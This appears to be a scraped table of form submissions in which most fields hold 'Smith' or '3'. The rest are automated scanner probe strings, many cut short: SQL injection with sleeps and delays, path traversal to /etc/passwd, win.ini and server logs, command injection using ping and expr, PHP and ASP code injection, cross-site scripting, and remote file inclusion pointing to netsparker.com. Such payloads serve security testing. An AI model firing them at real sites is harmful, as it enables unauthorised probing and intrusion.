/./././ |
3 |
| Smith |
Smith |
3 |
[php]print(int)0xFFF9999-22;[/php] |
3 |
| Smith |
Smith |
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||ch |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
http://netsparker.com/n? .php |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(6 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
print 0xFFF9999-22 |
3 |
| Smith |
Smith |
3 |
/../../../../../../../../../../../etc/passwd |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
';SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
http://netsparker.com/n?.php |
3 |
3 |
3 |
| Smith |
Smith |
3 |
eval('print 0xFFF9999-22') |
3 |
| Smith |
Smith |
3 |
/etc/passwd |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| "& SET /A 0xFFF9999-2 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
1;SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
ns:netsparker056650=vuln |
3 |
| Smith |
php://filter//resource=http://netsparker.com/n? .php |
3 |
3 |
3 |
| Smith |
Smith |
3 |
'+print 0xFFF9999-22+' |
3 |
| Smith |
Smith |
3 |
registration |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '& SET /A 0xFFF9999-2 & |
Smith |
3 |
3 |
3 |
| Smith |
netsparker.com/n |
3 |
3 |
3 |
| Smith |
Smith |
3 |
http://example.com/?
ns: netsparker056650=vuln |
3 |
| Smith |
Smith |
1);SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
"+print 0xFFF9999-22+" |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
registration |
3 |
| & SET /A 0xFFF9999-2 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
ns:netsparker056650=vuln |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
');SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
Smith |
response.write(268409241-22)' |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
3 |
| SET /A 0xFFF9999-2 & |
Smith |
3 |
3 |
3 |
| "& ping -n 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
ns:netsparker056650=vuln |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
+response.write(268409241-22)' |
3 |
3 |
| Smith |
Smith |
'));SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../boot.ini |
3 |
3 |
| "&expr 268409241 - 2 &" |
Smith |
3 |
3 |
3 |
| '& ping -n 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
"+response.write(268409241-22)+" |
3 |
3 |
| Smith |
Smith |
http://example.com/?
ns: netsparker056650=vuln |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
1));SELECT pg_sleep(25)-- |
3 |
3 |
| Smith |
Smith |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
3 |
3 |
| '&expr 268409241 - 2 &' |
Smith |
3 |
3 |
3 |
| & ping -n 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
<% response.write(268409241-22) %> |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
ns:netsparker056650=vuln |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../boot.ini .php |
3 |
3 |
| Smith |
Smith |
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64) |
3 |
3 |
| &expr 268409241 - 2 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ping -n 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
print(int)0xFFF9999-22 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
hTTp://netsparker.com/n |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
/../../../../../../../../../../boot.ini |
3 |
3 |
| %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%2 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
3 |
| "&ping -c 26 127.0.0.1 &" |
Smith |
3 |
3 |
3 |
| expr 268409241 - 2 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
+print(int)0xFFF9999-22;// |
3 |
3 |
| Smith |
Smith |
3 |
3 |
http://netsparker.com/n? .php |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
file:/windows/win.ini |
3 |
3 |
| data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzNDMyKTwvc2NyaXB |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
3 |
| '&ping -c 26 127.0.0.1 &' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
http://netsparker.com/n?.php |
| SET /A 0xFFF9999-2 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
'+print(int)0xFFF9999-22+' |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../windows/win.ini |
3 |
3 |
| '" ns= netsparker(0x003433) |
Smith |
3 |
3 |
3 |
| &ping -c 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
3 |
| Smith |
Smith |
3 |
3 |
php://filter//resource=http://netsparker.com/n? .php |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
"+print(int)0xFFF9999-22+" |
3 |
3 |
|
ns:netsparker056650=vuln |
Smith |
3 |
3 |
3 |
| expr 268409241 - 2 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../windows/win.ini .php |
3 |
3 |
| 1 ns=netsparker(0x003434) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
3 |
| ping -c 26 127.0.0.1 & |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
netsparker.com/n |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
<? print(int)0xFFF9999-22;//?> |
3 |
3 |
| http://example.com/?
ns: netsparker056650=vuln |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
c:\windows\win.ini |
3 |
3 |
| Smith |
"& SET /A 0xFFF9999-2 & |
3 |
3 |
3 |
| //netsparker.com/n/n.css?0x003435 |
Smith |
3 |
3 |
3 |
| ping -n 26 127.0.0.1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ns:netsparker056650=vuln |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
{php}print(int)0xFFF9999-22;{/php} |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../windows/iis6.log |
3 |
3 |
| Smith |
'& SET /A 0xFFF9999-2 & |
3 |
3 |
3 |
| '><net sparker=netsparker(0x003436)> |
Smith |
3 |
3 |
3 |
| ping -c 26 127.0.0.1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
${28275*28275-(13)} |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
ns:netsparker056650=vuln |
3 |
3 |
3 |
| Smith |
Smith |
'{${print(int)0xFFF9999-22}}' |
3 |
3 |
| Smith |
& SET /A 0xFFF9999-2 & |
3 |
3 |
3 |
| Smith |
Smith |
3 |
#{28274*28274-(13)} |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../proc/self/fd/2 |
3 |
3 |
| "><net sparker=netsparker(0x003437)> |
Smith |
3 |
3 |
3 |
| Smith |
"& ping -n 26 127.0.0.1 & |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
http://example.com/?
ns: netsparker056650=vuln |
3 |
3 |
3 |
| Smith |
Smith |
[php]print(int)0xFFF9999-22;[/php] |
3 |
3 |
| Smith |
Smith |
${28275*28275-(13)} |
3 |
3 |
| Smith |
SET /A 0xFFF9999-2 & |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../proc/self/fd/2 .php |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| javascript:netsparker(0x003438) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
print 0xFFF9999-22 |
3 |
3 |
| Smith |
'& ping -n 26 127.0.0.1 & |
3 |
3 |
3 |
| Smith |
Smith |
#{28274*28274-(13)} |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
ns:netsparker056650=vuln |
3 |
3 |
3 |
| Smith |
"&expr 268409241 - 2 &" |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../etc/httpd/logs/error.log |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| </a style=x:expre/**/ssion(netsparker(0x00343A))> |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
eval('print 0xFFF9999-22') |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../etc/httpd/logs/error_log |
3 |
3 |
| Smith |
& ping -n 26 127.0.0.1 & |
3 |
3 |
3 |
| Smith |
'&expr 268409241 - 2 &' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
'+print 0xFFF9999-22+' |
3 |
3 |
| */netsparker(0x00343D);/* |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../var/log/apache2/error.log |
3 |
3 |
| Smith |
ping -n 26 127.0.0.1 & |
3 |
3 |
3 |
| ${28275*28275-(13)} |
Smith |
3 |
3 |
3 |
| Smith |
&expr 268409241 - 2 & |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
"+print 0xFFF9999-22+" |
3 |
3 |
| '+netsparker(0x00343E)+' |
Smith |
3 |
3 |
3 |
| Smith |
"&ping -c 26 127.0.0.1 &" |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../var/log/apache/error.log |
3 |
3 |
| #{28274*28274-(13)} |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
expr 268409241 - 2 & |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
${28275*28275-(13)} |
3 |
3 |
3 |
| Smith |
'&ping -c 26 127.0.0.1 &' |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../proc/self/version |
3 |
3 |
| "+netsparker(0x00343F)+" |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ns:netsparker056650=vuln |
| Smith |
SET /A 0xFFF9999-2 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
#{28274*28274-(13)} |
3 |
3 |
3 |
| Smith |
&ping -c 26 127.0.0.1 & |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../proc/self/version .php |
3 |
3 |
| Smith |
Smith |
3 |
3 |
http://example.com/?
ns: netsparker056650=vuln |
| ',netsparker(0x003440),' |
Smith |
3 |
3 |
3 |
| %27 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
expr 268409241 - 2 |
3 |
3 |
3 |
| Smith |
ping -c 26 127.0.0.1 & |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ns:netsparker056650=vuln |
| Smith |
Smith |
../../../../../../../../../../../etc/passwd |
3 |
3 |
| netsparker(0x003441) |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100 |
Smith |
3 |
3 |
3 |
| Smith |
ping -n 26 127.0.0.1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../../etc/passwd |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
${28275*28275-(13)} |
|
netsparker(0x003442); |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR( |
Smith |
3 |
3 |
3 |
| Smith |
ping -c 26 127.0.0.1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
../../../../../../../../../../../etc/passwd .php |
3 |
3 |
| Smith |
Smith |
3 |
3 |
#{28274*28274-(13)} |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR( |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpas |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%2 |
3 |
3 |
3 |
| Smith |
Smith |
ns../../../../../../../../../../etc/passwd/././././././././././. |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzNDU4KTwvc2NyaXB |
3 |
3 |
3 |
| Smith |
Smith |
/../../../../../../../../../../../etc/passwd |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'" ns= netsparker(0x003461) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
/etc/passwd |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
1 ns=netsparker(0x003470) |
3 |
3 |
3 |
| Smith |
Smith |
registration |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
//netsparker.com/n/n.css?0x00347B |
3 |
3 |
3 |
| Smith |
Smith |
registration |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'><net sparker=netsparker(0x00347F)> |
3 |
3 |
3 |
| Smith |
Smith |
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CH |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
"><net sparker=netsparker(0x003485)> |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+ |
Smith |
3 |
3 |
3 |
| Smith |
javascript:netsparker(0x00348D) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"& SET /A 0xFFF9999-2 & |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CON |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
</a style=x:expre/**/ssion(netsparker(0x003495))> |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'& SET /A 0xFFF9999-2 & |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| -1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
*/netsparker(0x0034A6);/* |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"& ping -n 26 127.0.0.1 & |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
& SET /A 0xFFF9999-2 & |
| -1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'+netsparker(0x0034AF)+' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'& ping -n 26 127.0.0.1 & |
| (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA |
Smith |
3 |
3 |
3 |
| response.write(268409241-22)' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
"+netsparker(0x0034B3)+" |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
SET /A 0xFFF9999-2 & |
| Smith |
Smith |
3 |
3 |
& ping -n 26 127.0.0.1 & |
| +response.write(268409241-22)' |
Smith |
3 |
3 |
3 |
| cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
',netsparker(0x0034B4),' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ping -n 26 127.0.0.1 & |
| Smith |
Smith |
3 |
3 |
"&expr 268409241 - 2 &" |
| "+response.write(268409241-22)+" |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||ch |
Smith |
3 |
3 |
3 |
| Smith |
netsparker(0x0034B5) |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"&ping -c 26 127.0.0.1 &" |
| Smith |
Smith |
3 |
3 |
'&expr 268409241 - 2 &' |
| <% response.write(268409241-22) %> |
Smith |
3 |
3 |
3 |
| (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)|| |
Smith |
3 |
3 |
3 |
| Smith |
netsparker(0x0034B6); |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'&ping -c 26 127.0.0.1 &' |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
&expr 268409241 - 2 & |
| print(int)0xFFF9999-22 |
Smith |
3 |
3 |
3 |
| NSFTW |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
&ping -c 26 127.0.0.1 & |
| Smith |
Smith |
3 |
3 |
3 |
| '+NSFTW+' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
expr 268409241 - 2 & |
| +print(int)0xFFF9999-22;// |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ping -c 26 127.0.0.1 & |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
SET /A 0xFFF9999-2 |
| (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),C |
Smith |
3 |
3 |
3 |
| '+print(int)0xFFF9999-22+' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ping -n 26 127.0.0.1 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| -1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(9 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
expr 268409241 - 2 |
| "+print(int)0xFFF9999-22+" |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
ping -c 26 127.0.0.1 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR( |
Smith |
3 |
3 |
3 |
| <? print(int)0xFFF9999-22;//?> |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64) |
Smith |
3 |
3 |
3 |
| {php}print(int)0xFFF9999-22;{/php} |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '{${print(int)0xFFF9999-22}}' |
Smith |
3 |
3 |
3 |
| '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
%27 |
3 |
3 |
3 |
| [php]print(int)0xFFF9999-22;[/php] |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100 |
3 |
3 |
3 |
| print 0xFFF9999-22 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR( |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| eval('print 0xFFF9999-22') |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR( |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| '+print 0xFFF9999-22+' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CH |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+ |
3 |
3 |
3 |
| "+print 0xFFF9999-22+" |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CON |
3 |
3 |
3 |
| Smith |
response.write(268409241-22)' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
+response.write(268409241-22)' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
"+response.write(268409241-22)+" |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
-1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA |
3 |
3 |
3 |
| Smith |
<% response.write(268409241-22) %> |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0034FE%29%3C%2Fscript%3E |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
print(int)0xFFF9999-22 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzNTA4KTwvc2NyaXB0Pg== |
| Smith |
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../boot.ini |
Smith |
3 |
3 |
3 |
| Smith |
+print(int)0xFFF9999-22;// |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'" ns= netsparker(0x00350D) |
| Smith |
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||ch |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
Smith |
3 |
3 |
3 |
| Smith |
'+print(int)0xFFF9999-22+' |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
1 ns=netsparker(0x003514) |
| Smith |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../boot.ini .php |
Smith |
3 |
3 |
3 |
| Smith |
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)|| |
3 |
3 |
3 |
| Smith |
"+print(int)0xFFF9999-22+" |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
//netsparker.com/n/n.css?0x00351A |
| /../../../../../../../../../../boot.ini |
Smith |
3 |
3 |
3 |
| Smith |
NSFTW |
3 |
3 |
3 |
| Smith |
<? print(int)0xFFF9999-22;//?> |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
'><net sparker=netsparker(0x00351E)> |
| file:/windows/win.ini |
Smith |
3 |
3 |
3 |
| Smith |
'+NSFTW+' |
3 |
3 |
3 |
| Smith |
{php}print(int)0xFFF9999-22;{/php} |
3 |
3 |
3 |
| ';WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../windows/win.ini |
Smith |
3 |
3 |
3 |
| Smith |
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),C |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
"><net sparker=netsparker(0x003528)> |
| Smith |
'{${print(int)0xFFF9999-22}}' |
3 |
3 |
3 |
| 1;WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| ../../../../../../../../../../windows/win.ini .php |
Smith |
3 |
3 |
3 |
| Smith |
-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(9 |
3 |
3 |
3 |
| Smith |
[php]print(int)0xFFF9999-22;[/php] |
3 |
3 |
3 |
| WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
javascript:netsparker(0x003531) |
| Smith |
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR( |
3 |
3 |
3 |
| c:\windows\win.ini |
Smith |
3 |
3 |
3 |
| 1);WAITFOR DELAY '0:0:25'-- |
Smith |
3 |
3 |
3 |
| Smith |
print 0xFFF9999-22 |
3 |
3 |
3 |
| ../../../../../../../../../../windows/iis6.log |
Smith |
